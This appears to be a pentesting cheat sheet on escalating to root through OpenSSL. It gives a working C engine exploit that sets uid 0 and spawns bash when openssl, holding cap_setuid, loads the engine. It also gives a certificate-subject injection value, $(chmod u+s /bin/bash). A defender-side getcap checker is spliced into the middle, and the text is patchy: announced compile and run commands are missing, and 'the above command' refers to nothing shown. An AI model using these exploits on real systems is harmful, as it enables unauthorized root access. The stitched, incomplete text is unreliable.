
OpenSSL Privilege Escalation

Privilege Escalation (SUID)

Reference: https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/

1. Get Capabilities

Check the capabilities set on binaries in the target machine.

# -r: recursive
getcap -r / 2>/dev/null

If openssl has the capability set as shown below, it can be exploited.

/usr/bin/openssl = cap_setuid+ep
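As an added defender-side check (not part of the original page), the following Python parses getcap output such as the line above and flags binaries whose permitted or effective set holds a capability that allows credential changes or DAC bypass; the RISKY_CAPS set and the sample getcap output are this example's own construction.

```python
import re

# Capabilities that let a process change its credentials or bypass file permission
# checks; a binary holding one in its permitted or effective set is a local
# privilege-escalation risk (the page's openssl case is cap_setuid). Own choice of set.
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
              "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace"}

# Constructed sample of `getcap -r / 2>/dev/null` output, mixing the older
# "path = caps" format shown on the page with the newer "path caps" format.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/usr/bin/python3.8 cap_setuid=ep
/usr/bin/dumpcap cap_dac_override,cap_net_admin,cap_net_raw+eip
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>\S.*)$")
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)(?P<op>[=+-])(?P<flags>[eip]*)$")


def parse_getcap_line(line):
    """Parse one getcap line into (path, {capability: set(flags)}), or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    caps = {}
    # cap_text clauses are space separated: comma-separated names, an operator
    # (= set, + add, - drop) and flags e/i/p, e.g. "cap_net_admin,cap_net_raw+eip".
    for clause in m.group("caps").split():
        c = CLAUSE_RE.match(clause)
        if not c:
            return None
        flags, op = set(c.group("flags")), c.group("op")
        for name in c.group("names").split(","):
            current = caps.setdefault(name, set())
            if op == "=":
                current.clear()
            if op == "-":
                current -= flags
            else:
                current |= flags
    return m.group("path"), caps


def risky_entries(getcap_output):
    """Return (path, capability) pairs where a risky cap is permitted or effective."""
    hits = []
    for path, caps in filter(None, map(parse_getcap_line, getcap_output.splitlines())):
        hits += [(path, n) for n, f in caps.items() if n in RISKY_CAPS and f & {"e", "p"}]
    return hits
```

Run it against real `getcap -r /` output on a host and review each reported binary; a capability that is not required by the program should be removed with `setcap -r`.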

2. Create the Exploit in C

On your local machine, you need “libssl-dev” to use the header file “openssl/engine.h” in the exploit. If you don't have it yet, install it.

sudo apt install libssl-dev

Then create "exploit.c".

#include <stdlib.h>
#include <unistd.h>
#include <openssl/engine.h>

/* Called by openssl when this shared object is loaded as a dynamic engine.
   Because the binary holds cap_setuid, setuid(0) succeeds. */
static int bind(ENGINE *e, const char *id) {
    setuid(0); setgid(0);
    system("/bin/bash");
    return 1;  /* non-zero tells the engine loader that binding succeeded */
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

Now compile it using gcc.

3. Get the Root Shell

Transfer the "exploit.so" to the target machine.

Run the exploit; you should get a root shell.

Command Injection in Subject

If the above command is executed by root and the subject values are used in any way, we may be able to execute arbitrary commands as root.

Exploitation

For example, create a certificate that contains a malicious subject value. When the prompt asks us to enter values, we can insert an arbitrary command.

Then, when a shell script that uses the subject values is executed as root, our command ($(chmod u+s /bin/bash)) may be executed as root.
